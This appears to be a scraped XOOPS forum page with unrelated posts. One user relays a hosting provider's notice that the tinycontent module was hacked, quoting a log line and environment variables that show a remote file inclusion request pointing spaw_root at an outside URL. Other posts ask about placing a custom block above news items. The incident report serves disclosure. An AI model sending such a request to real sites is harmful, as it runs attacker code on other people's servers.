I have just received notice from my hosting provider that the tinycontent module in my installation was hacked and used to install software on my site. I am not qualified to determine if tinycontent is exploitable; I am recommending someone take a look at it.

Here is the info from my host:
------------------------------------------------------------------------------
Hello,

We need to inform you that your hosting account for [protected].com has been hacked and used to run illegal software on the server.

To prevent further abuse of your account and the server, we have disabled the following location on your account:

/home/[protected]/www/www/modules/tinycontent

Here is how the hackers have exploited your account:

62.193.230.18 - - [02/May/2007:12:31:16 +0800] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.cabulas.net/sky/sky/out2.txt? HTTP/1.1" 200 - "-" "libwww-perl/5.65

Please check the environmental variables of the process for your user:

PATH=/usr/local/bin:/usr/bin:/bin
DOCUMENT_ROOT=/home/[protected]/www/www
HTTP_CONNECTION=close
HTTP_HOST=www.[protected].com
HTTP_USER_AGENT=libwww-perl/5.65
REMOTE_ADDR=62.193.230.18
REMOTE_PORT=59296
SCRIPT_FILENAME=/home/[protected]/www/www/modules/tinycontent/admin/spaw/spaw_control.class.php
SERVER_ADDR=[protected]
SERVER_ADMIN=admin@[protected].com
SERVER_NAME=www.[protected].com
SERVER_PORT=80
SERVER_SOFTWARE=Apache
GATEWAY_INTERFACE=CGI/1.1
SERVER_PROTOCOL=HTTP/1.1
REQUEST_METHOD=GET
QUERY_STRING=spaw_root=http://www.cabulas.net/sky/sky/out2.txt?
REQUEST_URI=/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.cabulas.net/sky/sky/out2.txt?
SCRIPT_NAME=/modules/tinycontent/admin/spaw/spaw_control.class.php

Please upgrade any third party software you are using on your account to the latest versions. Also, if you are using any custom scripts, please secure them as soon as possible.

When you are ready to secure your account, please contact us, and we will enable the access to the disabled directory.

Thank you!

Please do not be offended, but I really don't believe hand-editing files is necessary to get what I'm looking for here. Maybe I didn't explain myself correctly:

What I want is a custom block to appear at the top/center of the front page of my website with news items below. For example:

CUSTOM BLOCK
NEWS ITEM 1
NEWS ITEM 2
NEWS ITEM 3
ETC.

I have a custom block and have set NEWS to be my default module, however no matter what weight I assign my custom block, it always appears below the news items.

I am going insane trying to get a layout similar to the xoops.org site. On the front page (in order) is "Welcome to XOOPS official website!", which appears to be a custom block. Below are other news and forum blocks AND THEN news entires.

I've tried multiple ways to get a custom block to reside above my news items (my default module), without success.

If one of the admins is listening, it might be helpful to know how you have laid-out xoops.org.

OK, so what was the fix? I'm interested as well.